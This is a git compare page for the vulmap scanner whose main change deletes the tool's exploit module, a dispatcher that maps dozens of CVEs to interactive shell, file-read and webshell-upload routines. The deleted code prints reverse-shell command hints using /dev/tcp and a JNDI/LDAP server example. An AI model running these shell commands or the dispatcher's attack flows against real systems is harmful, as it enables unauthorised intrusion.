zhzyker/vulmap
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Compare commits

base: zhzyker:7dea93373ba49f34dca7c5c1251232fa6653a3c4
Branches Tags
zhzyker:main
...
compare: zhzyker:3694afb7a3adec0b7f7c9027aab596e7b147c585
Branches Tags
zhzyker:main

10 Commits
7dea93373b ... 3694afb7a3

Author SHA1 Message Date
之乎者也
3694afb7a3 fofa.info 2022-04-13 21:23:54 +08:00
之乎者也
ca11a0483f fofa.info 2022-04-13 21:23:12 +08:00
之乎者也
c32dbc458e fix dismap 0.2 2021-11-15 13:12:22 +08:00
之乎者也
c63f68c98c Update readme.md 2021-10-15 14:27:01 +08:00
之乎者也
0b26dee9b9 Update readme.md 2021-10-04 21:26:39 +08:00
之乎者也
5370fb0429 Update readme.md 2021-09-27 09:49:14 +08:00
之乎者也
dbdd5b902e wechat group 2021-09-20 09:33:45 +08:00
之乎者也
03c4de5e11 Merge pull request #55 from yumusb/main 
Update QiAnXin.py
 2021-09-06 14:10:29 +08:00
榆木
8f7ae044e0 Update QiAnXin.py 2021-09-06 12:30:26 +08:00
zhzyker
6bd19e783d rm exploit 2021-09-01 10:58:00 +08:00
10 changed files with 11 additions and 414 deletions
Expand all files Collapse all files

14
core/core.py
View File

@@ -17,7 +17,6 @@ from module.api.fofa import fofa
from module.api.dns import dns_result, dns_request
from module.api.shodan import shodan_api
from core.scan import scan
from core.exploit import exploit
from identify.identify import Identify
from concurrent.futures import ThreadPoolExecutor, wait, ALL_COMPLETED
@@ -25,6 +24,7 @@ from concurrent.futures import ThreadPoolExecutor, wait, ALL_COMPLETED
class Core(object):
@staticmethod
def control_options(args): # 选项控制,用于处理所有选项
mode = "poc"
delay = globals.get_value("DELAY") # 获取全局变量延时时间DELAY
now_warn = now.timed(de=delay) + color.red_warn()
if args.socks:
@@ -37,8 +37,6 @@ class Core(object):
exit(0)
if args.thread_num != 10: # 判断是否为默认线程
print(now.timed(de=0) + color.yel_info() + color.yellow(" Custom thread number: " + str(args.thread_num)))
if args.vul is not None: # 判断是否-v进行漏洞利用
args.mode = "exp" # 若进行漏洞利用修改模式为exp
if args.debug is False: # 判断是否开启--debug功能
print(now.timed(de=delay) + color.yel_info() + color.yellow(" Using debug mode to echo debug information"))
globals.set_value("DEBUG", "debug") # 设置全局变量DEBUG
@@ -55,7 +53,7 @@ class Core(object):
if os.path.isfile(args.O_JSON): # 判断json输出文件是否冲突
print(now.timed(de=delay) + color.red_warn() + color.red(" The json file: [" + args.O_JSON + "] already exists"))
exit(0)
if args.mode is None or args.mode == "poc": # 判断是否进入poc模式
if mode == "poc": # 判断是否进入poc模式
if args.url is not None and args.file is None: # 判断是否为仅-u扫描单个URL
args.url = url_check(args.url) # 处理url格式
if survival_check(args.url) == "f": # 检查目标存活状态
@@ -113,11 +111,6 @@ class Core(object):
print(now.timed(de=delay) + color.yel_info() + color.cyan(" Scan result text saved to: " + args.O_TEXT))
if args.O_JSON:
print(now.timed(de=delay) + color.yel_info() + color.cyan(" Scan result json saved to: " + args.O_JSON))
elif args.mode == "exp": # 漏洞利用模式参数较少
if args.vul is not None and args.url is not None: # 判断是否进入漏洞利用模式
core.control_webapps("url", args.url, args.vul, "exp")
else:
print(now_warn + color.red(" Options error, -v must specify -u"))
else:
print(now_warn + color.red(" Options error ... ..."))
@@ -256,9 +249,6 @@ class Core(object):
joinall(gevent_pool) # 运行协程池
wait(thread_poc, return_when=ALL_COMPLETED) # 等待所有多线程任务运行完
print(now.timed(de=0) + color.yel_info() + color.yellow(" Scan completed and ended "))
elif mode == "exp": # 漏洞利用
vul_num = webapps
exploit(target, vul_num) # 调用core中的exploit
@staticmethod
def scan_webapps(webapps_identify, thread_poc, thread_pool, gevent_pool, target):

390
core/exploit.py
View File

@@ -1,390 +0,0 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys
from module import globals
from module.time import now
from module.color import color
from module.allcheck import os_check, url_check, survival_check
from payload.ApacheShiro import ApacheShiro
from payload.ApacheSolr import ApacheSolr
from payload.ApacheTomcat import ApacheTomcat
from payload.Elasticsearch import Elasticsearch
from payload.Jenkins import Jenkins
from payload.Spring import Spring
from payload.OracleWeblogic import OracleWeblogic
from payload.ApacheFlink import ApacheFlink
from payload.Nexus import Nexus
from payload.RadHatJBoss import RedHatJBoss
from payload.ApacheUnomi import ApacheUnomi
from payload.ThinkPHP import ThinkPHP
from payload.Drupal import Drupal
from payload.ApacheStruts2 import ApacheStruts2
from payload.Fastjson import Fastjson
from payload.ApacheDruid import ApacheDruid
from payload.Laravel import Laravel
from payload.Vmware import Vmware
from payload.SaltStack import SaltStack
from payload.Exchange import Exchange
from payload.F5_BIG_IP import BIG_IP
from payload.ApacheOFBiz import ApacheOFBiz
from payload.QiAnXin import QiAnXin
from payload.Eyou import Eyou
from payload.Ecology import Ecology
explists = ("CVE-2017-12629", "CVE-2019-17558", "S2-005", "S2-008", "S2-009", "S2-013", "S2-015", "S2-016", "S2-029",
"S2-032", "S2-045", "S2-046", "S2-048", "S2-052", "S2-057", "S2-059", "S2-061", "S2-devMode",
"CVE-2014-3120", "CVE-2015-1427", "CVE-2016-3088", "CVE-2016-4437", "CVE-2017-12615", "CVE-2020-1938",
"CVE-2018-7600", "CVE-2018-7602", "CVE-2019-6340", "CVE-2018-1000861", "CVE-2019-7238", "CVE-2020-10199",
"CVE-2017-3506", "CVE-2017-10271", "CVE-2018-2894", "CVE-2019-2725", "CVE-2019-2729", "CVE-2020-2555",
"CVE-2020-2883", "CVE-2020-14882", "CVE-2010-0738", "CVE-2010-1428", "CVE-2015-7501", "CVE-2018-20062",
"CVE-2019-9082", "CVE-2020-13942", "CVE-2020-17519", "CVE-2019-3799", "CVE-2020-5410", "cve-2017-12629",
"cve-2019-17558", "s2-005", "s2-008", "s2-009", "s2-013", "s2-015", "s2-016", "s2-029", "s2-032",
"s2-045", "s2-046", "s2-048", "s2-052", "s2-057", "s2-059", "s2-061", "s2-devmode", "cve-2014-3120",
"cve-2015-1427", "cve-2016-3088", "cve-2016-4437", "cve-2017-12615", "cve-2020-1938", "cve-2018-7600",
"cve-2018-7602", "cve-2019-6340", "cve-2018-1000861", "cve-2019-7238", "cve-2020-10199", "cve-2017-3506",
"cve-2017-10271", "cve-2018-2894", "cve-2019-2725", "cve-2019-2729", "cve-2020-2555", "cve-2020-2883",
"cve-2020-14882", "cve-2010-0738", "cve-2010-1428", "cve-2015-7501", "cve-2018-20062", "cve-2019-9082",
"cve-2020-13942", "cve-2020-17519", "cve-2019-3799", "cve-2020-5410", "VER-1224-2", "VER-1224-1", "VER-1247",
"VER-1262", "ver-1224-2", "ver-1224-1", "ver-1247", "ver-1262", "ver-1224-3", "VER-1224-3",
"CVE-2021-25646", "cve-2021-25646", "CVE-2018-15133", "cve-2018-15133", "CVE-2021-21972", "cve-2021-21972",
"CVE-2021-25282", "cve-2021-25282", "CVE-2021-27065", "cve-2021-27065", "CVE-2021-22986", "cve-2021-22986",
"CVE-2020-5902", "cve-2020-5902", "CVE-2021-26295", "cve-2021-26295", "time-2021-0410", "CVE-2021-2109",
"cve-2021-2109", "cnvd-2021-26422", "CNVD-2021-26422", "CVE-2021-30128", "cve-2021-30128", "time-2021-0515",
"TIME-202-0515")
def exploit(target, vul_num):
target = url_check(target)
if survival_check(target) == "f":
print(now.timed(de=0) + color.red_warn() + color.red(" Survival check failed: " + target))
exit(0)
delay = globals.get_value("DELAY") # 获取全局变量DELAY
exp_apache_shiro = ApacheShiro(target)
exp_apache_solr = ApacheSolr(target)
exp_apache_tomcat = ApacheTomcat(target)
exp_elasticsearch = Elasticsearch(target)
exp_apache_flink = ApacheFlink(target)
exp_jenkins = Jenkins(target)
exp_spring = Spring(target)
exp_nexus = Nexus(target)
exp_oracle_weblogic = OracleWeblogic(target)
exp_redhat_jboss = RedHatJBoss(target)
exp_apache_unomi = ApacheUnomi(target)
exp_thinkphp = ThinkPHP(target)
exp_drupal = Drupal(target)
exp_fastjson = Fastjson(target)
exp_apache_struts2 = ApacheStruts2(target)
exp_apache_druid = ApacheDruid(target)
exp_laravel = Laravel(target)
exp_vmware = Vmware(target)
exp_saltstack = SaltStack(target)
exp_exchange = Exchange(target)
exp_big_ip = BIG_IP(target)
exp_apache_ofbiz = ApacheOFBiz(target)
exp_qianxin = QiAnXin(target)
exp_eyou = Eyou(target)
exp_ecology = Ecology(target)
print(now.timed(de=delay) + color.yel_info() + color.cyan(" Target url: " + target))
print(now.timed(de=delay) + color.yel_info() + color.cyan(" Use exploit modules: " + vul_num))
nc = now.timed(de=0) + color.yel_info() + color.yellow(" input \"nc\" bounce linux shell")
up = now.timed(de=0) + color.yel_info() + color.yellow(" input \"upload\" upload webshell")
rmi_ldap = now.timed(de=0) + color.yel_info() + color.yellow(" RMI/LDAP Server:(e.g. ldap://192.168.0.1/Exploit)")
bash = now.timed(de=0) + color.yel_info() + color.yellow(" nc shell: \"bash -i >&/dev/tcp/127.0.0.1/9999 0>&1\"")
bash_2 = now.timed(de=0) + color.yel_info() + color.yellow(" nc shell: \"/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/127.0.0.1/8888 0>&1\"")
jndi = now.timed(de=0) + color.yel_info() + color.yellow(" Reference https://github.com/feihong-cs/JNDIExploit")
cmd = "whoami" # 为了消除pycharm错误提示没啥用
file = "/etc/passwd" # 为了消除pycharm错误提示没啥用
path = "/tmp/test" # 为了消除pycharm错误提示没啥用
shiro_key = "1" # 为了消除pycharm错误提示没啥用
shiro_gadget = "1" # 为了消除pycharm错误提示没啥用
nexus_u = "admin" # 为了消除pycharm错误提示没啥用
nexus_p = "admin" # 为了消除pycharm错误提示没啥用
laravel_key = "null" # 为了消除pycharm错误提示没啥用
laravel_gadget = 1 # 为了消除pycharm错误提示没啥用
if vul_num not in explists:
print(now.timed(de=0) + color.red_warn() + color.red(
" The vulnerability does not support exploitation. Please refer to \"--list\""))
sys.exit(0)
elif vul_num == "CVE-2016-4437" or vul_num == "cve-2016-4437":
if os_check() == "linux" or os_check() == "other":
shiro_key = input(now.timed(de=delay) + color.green("[+] key: "))
shiro_gadget = input(now.timed(de=delay) + color.green("[+] gadget: "))
elif os_check() == "windows":
shiro_key = input(now.no_color_timed(de=delay) + "[+] key: ")
shiro_gadget = input(now.no_color_timed(de=delay) + "[+] gadget: ")
while True:
if os_check() == "linux" or os_check() == "other":
cmd = input(now.timed(de=delay) + color.green("[+] Shell >>> "))
elif os_check() == "windows":
cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ")
if cmd == "exit" or cmd == "quit" or cmd == "bye":
sys.exit(0)
exp_apache_shiro.cve_2016_4437_exp(cmd, shiro_key, shiro_gadget)
elif vul_num == "CVE-2020-1938" or vul_num == "cve-2020-1938":
print(now.timed(de=delay) + color.yel_info() + color.yellow(" Examples: WEB-INF/web.xml"))
while True:
if os_check() == "linux" or os_check() == "other":
file = input(now.timed(de=delay) + color.green("[+] File >>> "))
elif os_check() == "windows":
file = input(now.no_color_timed(de=delay) + "[+] File >>> ")
if file == "exit" or file == "quit" or file == "bye":
exit(0)
exp_apache_tomcat.cve_2020_1938_exp(file)
elif vul_num == "CVE-2019-3799" or vul_num == "cve-2019-3799":
print(now.timed(de=delay) + color.yel_info() + color.yellow(" Examples: /etc/passwd"))
while True:
if os_check() == "linux" or os_check() == "other":
file = input(now.timed(de=delay) + color.green("[+] File >>> "))
elif os_check() == "windows":
file = input(now.no_color_timed(de=delay) + "[+] File >>> ")
if file == "exit" or file == "quit" or file == "bye":
exit(0)
exp_spring.cve_2019_3799_exp(file)
elif vul_num == "CVE-2020-5410" or vul_num == "cve-2020-5410":
print(now.timed(de=delay) + color.yel_info() + color.yellow(" Examples: /etc/passwd"))
while True:
if os_check() == "linux" or os_check() == "other":
file = input(now.timed(de=delay) + color.green("[+] File >>> "))
elif os_check() == "windows":
file = input(now.no_color_timed(de=delay) + "[+] File >>> ")
if file == "exit" or file == "quit" or file == "bye":
exit(0)
exp_spring.cve_2020_5410_exp(file)
elif vul_num == "CVE-2020-17519" or vul_num == "cve-2020-17519":
print(now.timed(de=delay) + color.yel_info() + color.yellow(" Examples: /etc/passwd"))
while True:
if os_check() == "linux" or os_check() == "other":
file = input(now.timed(de=delay) + color.green("[+] File >>> "))
elif os_check() == "windows":
file = input(now.no_color_timed(de=delay) + "[+] File >>> ")
if file == "exit" or file == "quit" or file == "bye":
exit(0)
exp_apache_flink.cve_2020_17519_exp(file)
elif vul_num == "CVE-2020-10199" or vul_num == "cve-2020-10199":
if os_check() == "linux" or os_check() == "other":
nexus_u = input(now.timed(de=delay) + color.green("[+] Input username: "))
nexus_p = input(now.timed(de=delay) + color.green("[+] Input password: "))
elif os_check() == "windows":
nexus_u = input(now.no_color_timed(de=delay) + "[+] Input username: ")
nexus_p = input(now.no_color_timed(de=delay) + "[+] Input password: ")
while True:
if os_check() == "linux" or os_check() == "other":
cmd = input(now.timed(de=delay) + color.green("[+] Shell >>> "))
elif os_check() == "windows":
cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ")
if cmd == "exit" or cmd == "quit" or cmd == "bye":
sys.exit(0)
exp_nexus.cve_2020_10199_exp(cmd, nexus_u, nexus_p)
elif vul_num == "CVE-2018-15133" or vul_num == "cve-2018-15133":
if os_check() == "linux" or os_check() == "other":
laravel_key = input(now.timed(de=delay) + color.green("[+] Input APP_KEY: "))
elif os_check() == "windows":
laravel_key = input(now.no_color_timed(de=delay) + "[+] Input APP_KEY: ")
if os_check() == "linux" or os_check() == "other":
laravel_gadget = input(now.timed(de=delay) + color.green("[+] Input phpggc gadget Laravel/RCE[1-4] (default:1): "))
elif os_check() == "windows":
laravel_gadget = input(now.no_color_timed(de=delay) + "[+] Input phpggc gadget Laravel/RCE[1-4] (default:1): ")
while True:
if os_check() == "linux" or os_check() == "other":
cmd = input(now.timed(de=delay) + color.green("[+] Shell >>> "))
elif os_check() == "windows":
cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ")
if cmd == "exit" or cmd == "quit" or cmd == "bye":
sys.exit(0)
exp_laravel.cve_2018_15133_exp(cmd, laravel_key, laravel_gadget)
elif vul_num == "CVE-2021-21972" or vul_num == "cve-2021-21972":
if os_check() == "linux" or os_check() == "other":
os_type = input(now.timed(de=delay) + color.green("[+] The target os type (linux/windows): "))
elif os_check() == "windows":
os_type = input(now.no_color_timed(de=delay) + "[+] The target os type (linux/windows): ")
while True:
if os_check() == "linux" or os_check() == "other":
cmd = input(now.timed(de=delay) + color.green("[+] Shell >>> "))
elif os_check() == "windows":
cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ")
if cmd == "exit" or cmd == "quit" or cmd == "bye":
sys.exit(0)
exp_vmware.cve_2021_21972_exp(cmd, os_type)
elif vul_num == "CVE-2021-25282" or vul_num == "cve-2021-25282":
if os_check() == "linux" or os_check() == "other":
file = input(now.timed(de=delay) + color.green("[+] upload file: "))
path = input(now.timed(de=delay) + color.green("[+] upload path (e.g. /tmp/test.txt): "))
elif os_check() == "windows":
file = input(now.no_color_timed(de=delay) + "[+] upload file: ")
path = input(now.no_color_timed(de=delay) + "[+] upload path (e.g. /tmp/test.txt): ")
while True:
if os_check() == "linux" or os_check() == "other":
cmd = input(now.timed(de=delay) + color.green("[+] Shell >>> "))
elif os_check() == "windows":
cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ")
if cmd == "exit" or cmd == "quit" or cmd == "bye":
sys.exit(0)
exp_saltstack.cve_2021_25282_exp(cmd, file, path)
elif vul_num == "CVE-2021-27065" or vul_num == "cve-2021-27065":
if os_check() == "linux" or os_check() == "other":
email = input(now.timed(de=delay) + color.green("[+] email: "))
file = input(now.timed(de=delay) + color.green("[+] webshell name (e.g. shell.aspx): "))
elif os_check() == "windows":
email = input(now.timed(de=delay) + "[+] email: ")
file = input(now.no_color_timed(de=delay) + "[+] uwebshell name (e.g. shell.aspx: ")
while True:
if os_check() == "linux" or os_check() == "other":
cmd = input(now.timed(de=delay) + color.green("[+] Shell >>> "))
elif os_check() == "windows":
cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ")
if cmd == "exit" or cmd == "quit" or cmd == "bye":
sys.exit(0)
exp_exchange.cve_2021_27065_exp(cmd, file, email)
elif vul_num == "CVE-2021-2109" or vul_num == "cve-2021-2109":
print(jndi)
if os_check() == "linux" or os_check() == "other":
ldap = input(now.timed(de=delay) + color.green("[+] ldap (e.g. ldap://127.0.0.1:1389/Basic/WeblogicEcho ): "))
elif os_check() == "windows":
ldap = input(now.no_color_timed(de=delay) + color.green("[+] ldap (e.g. ldap://127.0.0.1:1389/Basic/WeblogicEcho ): "))
while True:
if os_check() == "linux" or os_check() == "other":
cmd = input(now.timed(de=delay) + "[+] Shell >>> ")
elif os_check() == "windows":
cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ")
if cmd == "exit" or cmd == "quit" or cmd == "bye":
sys.exit(0)
exp_oracle_weblogic.cve_2021_2109_exp(ldap, cmd)
# 远程命令执行漏洞单独简单运行
else:
while True:
if os_check() == "linux" or os_check() == "other":
cmd = input(now.timed(de=delay) + color.green("[+] Shell >>> "))
elif os_check() == "windows":
cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ")
if cmd == "exit" or cmd == "quit" or cmd == "bye":
exit(0)
elif vul_num == "CVE-2017-12615" or vul_num == "cve-2017-12615":
exp_apache_tomcat.cve_2017_12615_exp(cmd)
elif vul_num == "CVE-2014-3120" or vul_num == "cve-2014-3120":
exp_elasticsearch.cve_2014_3120_exp(cmd)
elif vul_num == "CVE-2015-1427" or vul_num == "cve-2015-1427":
exp_elasticsearch.cve_2015_1427_exp(cmd)
elif vul_num == "CVE-2018-1000861" or vul_num == "cve-2018-1000861":
exp_jenkins.cve_2018_1000861_exp(cmd)
elif vul_num == "CVE-2017-3506" or vul_num == "cve-2017-3506":
exp_oracle_weblogic.cve_2017_3506_exp(cmd)
elif vul_num == "CVE-2017-10271" or vul_num == "cve-2017-10271":
print(nc)
print(up)
exp_oracle_weblogic.cve_2017_10271_exp(cmd)
elif vul_num == "CVE-2018-2894" or vul_num == "cve-2018-2894":
exp_oracle_weblogic.cve_2018_2894_exp(cmd)
elif vul_num == "CVE-2019-2725" or vul_num == "cve-2019-2725":
print(nc)
print(up)
exp_oracle_weblogic.cve_2019_2725_exp(cmd)
elif vul_num == "CVE-2019-2729" or vul_num == "CVE-2019-2729":
print(nc)
exp_oracle_weblogic.cve_2019_2729_exp(cmd)
elif vul_num == "CVE-2020-2555" or vul_num == "cve-2020-2555":
exp_oracle_weblogic.cve_2020_2555_exp(cmd)
elif vul_num == "CVE-2020-2883" or vul_num == "cve-2020-2883":
exp_oracle_weblogic.cve_2020_2883_exp(cmd)
elif vul_num == "CVE-2020-14882" or vul_num == "cve-2020-14882":
exp_oracle_weblogic.cve_2020_14882_exp(cmd)
elif vul_num == "CVE-2017-12629" or vul_num == "cve-2017-12629":
exp_apache_solr.cve_2017_12629_exp(cmd)
elif vul_num == "CVE-2019-17558" or vul_num == "cve-2019-17558":
exp_apache_solr.cve_2019_17558_exp(cmd)
elif vul_num == "CVE-2019-7238" or vul_num == "cve-2019-7238":
exp_nexus.cve_2019_7238_exp(cmd)
elif vul_num == "CVE-2010-0738" or vul_num == "cve-2010-0738":
exp_redhat_jboss.cve_2010_0738_exp(cmd)
elif vul_num == "CVE-2010-1428" or vul_num == "cve-2010-1428":
exp_redhat_jboss.cve_2010_1428_exp(cmd)
elif vul_num == "CVE-2015-7501" or vul_num == "cve-2015-7501":
exp_redhat_jboss.cve_2015_7501_exp(cmd)
elif vul_num == "CVE-2020-13942" or vul_num == "cve-2020-13942":
exp_apache_unomi.cve_2020_13942_exp(cmd)
elif vul_num == "CVE-2019-9082" or vul_num == "cve-2019-9082":
print(up)
exp_thinkphp.cve_2019_9082_exp(cmd)
elif vul_num == "CVE-2018-20062" or vul_num == "cve-2018-20062":
exp_thinkphp.cve_2018_20062_exp(cmd)
elif vul_num == "CVE-2018-7600" or vul_num == "cve-2018-7600":
exp_drupal.cve_2018_7600_exp(cmd)
elif vul_num == "CVE-2018-7602" or vul_num == "cve-2018-7602":
exp_drupal.cve_2018_7602_exp(cmd)
elif vul_num == "CVE-2019-6340" or vul_num == "cve-2019-6340":
exp_drupal.cve_2019_6340_exp(cmd)
elif vul_num == "S2-005" or vul_num == "s2-005":
exp_apache_struts2.s2_005_exp(cmd)
elif vul_num == "S2-008" or vul_num == "s2-008":
exp_apache_struts2.s2_008_exp(cmd)
elif vul_num == "S2-009" or vul_num == "s2-009":
exp_apache_struts2.s2_009_exp(cmd)
elif vul_num == "S2-013" or vul_num == "s2-013":
exp_apache_struts2.s2_013_exp(cmd)
elif vul_num == "S2-015" or vul_num == "s2-015":
exp_apache_struts2.s2_015_exp(cmd)
elif vul_num == "S2-016" or vul_num == "s2-016":
exp_apache_struts2.s2_016_exp(cmd)
elif vul_num == "S2-029" or vul_num == "s2-029":
exp_apache_struts2.s2_029_exp(cmd)
elif vul_num == "S2-032" or vul_num == "s2-032":
exp_apache_struts2.s2_032_exp(cmd)
elif vul_num == "S2-045" or vul_num == "s2-045":
exp_apache_struts2.s2_045_exp(cmd)
elif vul_num == "S2-046" or vul_num == "s2-046":
exp_apache_struts2.s2_046_exp(cmd)
elif vul_num == "S2-048" or vul_num == "s2-048":
exp_apache_struts2.s2_048_exp(cmd)
elif vul_num == "S2-052" or vul_num == "s2-052":
exp_apache_struts2.s2_052_exp(cmd)
elif vul_num == "S2-057" or vul_num == "s2-057":
exp_apache_struts2.s2_057_exp(cmd)
elif vul_num == "S2-059" or vul_num == "s2-059":
exp_apache_struts2.s2_059_exp(cmd)
elif vul_num == "S2-061" or vul_num == "s2-061":
exp_apache_struts2.s2_061_exp(cmd)
elif vul_num == "S2-devMode" or vul_num == "s2-devmode":
exp_apache_struts2.s2_devMode_exp(cmd)
elif vul_num == "VER-1224-1" or vul_num == "ver-1224-1":
print(rmi_ldap)
exp_fastjson.fastjson_1224_1_exp(cmd)
elif vul_num == "VER-1224-2" or vul_num == "ver-1224-2":
exp_fastjson.fastjson_1224_2_exp(cmd)
elif vul_num == "VER-1224-3" or vul_num == "ver-1224-3":
exp_fastjson.fastjson_1224_3_exp(cmd)
elif vul_num == "VER-1247" or vul_num == "ver-1247":
print(rmi_ldap)
exp_fastjson.fastjson_1247_exp(cmd)
elif vul_num == "VER-1262" or vul_num == "ver-1262":
print(rmi_ldap)
exp_fastjson.fastjson_1262_exp(cmd)
elif vul_num == "CVE-2021-25646" or vul_num == "cve-2021-25646":
print(bash_2)
exp_apache_druid.cve_2021_25646_exp(cmd)
elif vul_num == "CVE-2021-22986" or vul_num == "cve-2021-22986":
exp_big_ip.cve_2021_22986_exp(cmd)
elif vul_num == "CVE-2020-5902" or vul_num == "cve-2020-5902":
print(now.timed(de=delay) + color.yel_info() + color.yellow(" Examples: /etc/passwd"))
exp_big_ip.cve_2020_5902_exp(cmd)
elif vul_num == "CVE-2021-26295" or vul_num == "cve-2021-26295":
print(now.timed(de=delay) + color.yel_info() + color.yellow(" java encode: http://www.jackson-t.ca/runtime-exec-payloads.html"))
exp_apache_ofbiz.cve_2021_26295_exp(cmd)
elif vul_num == "CVE-2021-30128" or vul_num == "cve-2021-30128":
print(now.timed(de=delay) + color.yel_info() + color.yellow(" java encode: http://www.jackson-t.ca/runtime-exec-payloads.html"))
exp_apache_ofbiz.cve_2021_30128_exp(cmd)
elif vul_num == "time-2021-0410" or vul_num == "TIME-2021-0410":
exp_qianxin.time_2021_0410_exp(cmd)
elif vul_num == "CNVD-2021-26422" or vul_num == "cnvd-2021-26422":
exp_eyou.cnvd_2021_26422_exp(cmd)
elif vul_num == "time-2021-0515" or vul_num == "TIME-2021-0515":
exp_ecology.time_2021_0515_exp(cmd)
else:
pass

2
module/api/fofa.py
View File

@@ -16,7 +16,7 @@ def fofa(fofa, size):
fofa_target = []
keyword = base64.b64encode(str.encode(fofa))
qbase = keyword.decode('ascii')
api_url = "https://fofa.so/api/v1/search/all?email={email}&key={key}&size={size}&qbase64={qbase}".format(email=email, key=key, size=size, qbase=qbase)
api_url = "https://fofa.info/api/v1/search/all?email={email}&key={key}&size={size}&qbase64={qbase}".format(email=email, key=key, size=size, qbase=qbase)
print(now.timed(de=0) + color.yel_info() + color.yellow(" Fofa api: " + api_url))
try:
res = requests.get(api_url, headers=headers, timeout=timeout, verify=False)

3
module/argparse.py
View File

@@ -11,9 +11,7 @@ def arg():
target.add_argument("--fofa", dest="fofa", metavar='keyword', type=str, help=" call fofa api to scan (e.g. --fofa \"app=Apache-Shiro\")")
target.add_argument("--shodan", dest="shodan", metavar='keyword', type=str, help=" call shodan api to scan (e.g. --shodan \"Shiro\")")
mo = parser.add_argument_group("mode", "options vulnerability scanning or exploit mode")
mo.add_argument("-m", "--mode", dest="mode", type=str, help="supports poc and exp, if not specified the default poc")
mo.add_argument("-a", dest="app", type=str, nargs='+', help="specify webapps (e.g. -a \"tomcat\") allow multiple")
mo.add_argument("-v", "--vul", type=str, default=None, help="exploit, specify vuln number (e.g. -v CVE-2019-2729)")
ge = parser.add_argument_group("general", "general options")
ge.add_argument("-h", "--help", action="help", help="show this help message and exit")
ge.add_argument("-t", "--thread", dest="thread_num", type=int, default=10, metavar='NUM',
@@ -42,7 +40,6 @@ def arg():
example.add_argument(action='store_false',
dest="python3 vulmap.py -u http://example.com\n "
"python3 vulmap.py -u http://example.com -a struts2\n "
"python3 vulmap.py -u http://example.com:7001 -v CVE-2019-2729\n "
"python3 vulmap.py -f list.txt -a weblogic -t 20\n "
"python3 vulmap.py -f list.txt --output-json results.json\n "
"python3 vulmap.py --fofa \"app=Apache-Shiro\"")

2
module/banner.py
View File

@@ -140,5 +140,5 @@ def vul_list():
| Vmware vCenter | CVE-2021-21972 | Y | Y | 7.0 < 7.0U1c, 6.7 < 6.7U3l, 6.5 < 6.5U3n, any file upload |
| VMware vRealize | CVE-2021-21975 | Y | N | <= 8.3.0, vmware vrealize operations manager api ssrf |
+-------------------+------------------+-----+-----+-------------------------------------------------------------+
""")
""" + color.yellow("\n Vulmap release does not provide the exploit function after September 1, 2021 \n"))
return vuln_list

2
module/dismap.py
View File

@@ -7,7 +7,7 @@ from module.time import now
from module.color import color
def dismap(line):
if "dismap 0.1 output file" in line:
if "dismap" in line:
print(now.timed(de=0) + color.yel_info() + color.green(" The file is dismap Identification results"))
globals.set_value("DISMAP", "true")
return "######"

2
payload/QiAnXin.py
View File

@@ -56,7 +56,7 @@ class QiAnXin():
request = requests.post(url, data=data, headers=self.headers, timeout=self.timeout, verify=False)
url = urljoin(self.url, md + ".txt")
req = requests.get(url, data="1", headers=self.headers, timeout=self.timeout, verify=False)
if md in misinformation(req.text, md) and req.status_code == 200:
if md in misinformation(req.text, md) and (md + ".txt") not in req.text and req.status_code == 200:
self.vul_info["vul_data"] = dump.dump_all(request).decode('utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info["vul_payd"] = data

4
readme.md
View File

@@ -30,7 +30,7 @@ python3 vulmap.py -u http://example.com
使用 Fofa or Shodan 需要修改 vulmap.py 中的配置信息:
* Fofa info: https://fofa.so/user/users/info
* Fofa info: https://fofa.info/user/users/info
```bash
# 把xxxxxxxxxx替换成fofa的邮箱
globals.set_value("fofa_email", "xxxxxxxxxx")
@@ -71,7 +71,7 @@ globals.set_value("ceye_token", "xxxxxxxxxx")
## 🙋 Discussion
* Vulmap Bug 反馈或新功能建议[点我](https://github.com/zhzyker/vulmap/issues)
* Twitter: https://twitter.com/zhzyker
* WeChat: ~二群已开放~ 又满了,再加我拉吧
* WeChat: ~~扫码入群聊~~群聊满200了扫码再加群了
<p>
<img alt="QR-code" src="https://github.com/zhzyker/zhzyker/blob/main/my-wechat.jpg" width="20%" height="20%" style="max-width:100%;">
</p>

2
version
View File

@@ -1 +1 @@
0.8
0.9

4
vulmap.py
View File

@@ -28,13 +28,13 @@ def config():
}
globals.init() # 初始化全局变量模块
globals.set_value("UA", args.ua) # 设置全局变量UA
globals.set_value("VUL", args.vul) # 设置全局变量VULN用于判断是否漏洞利用模式
globals.set_value("VUL", None) # 设置全局变量VULN用于判断是否漏洞利用模式
globals.set_value("CHECK", args.check) # 目标存活检测
globals.set_value("DEBUG", args.debug) # 设置全局变量DEBUG
globals.set_value("DELAY", args.delay) # 设置全局变量延时时间DELAY
globals.set_value("DNSLOG", args.dnslog) # 用于判断使用哪个dnslog平台
globals.set_value("DISMAP", "flase") # 是否接收dismap识别结果(false/true)
globals.set_value("VULMAP", str(0.8)) # 设置全局变量程序版本号
globals.set_value("VULMAP", str(0.9)) # 设置全局变量程序版本号
globals.set_value("O_TEXT", args.O_TEXT) # 设置全局变量OUTPUT判断是否输出TEXT
globals.set_value("O_JSON", args.O_JSON) # 设置全局变量OUTPUT判断是否输出JSON
globals.set_value("HEADERS", header) # 设置全局变量HEADERS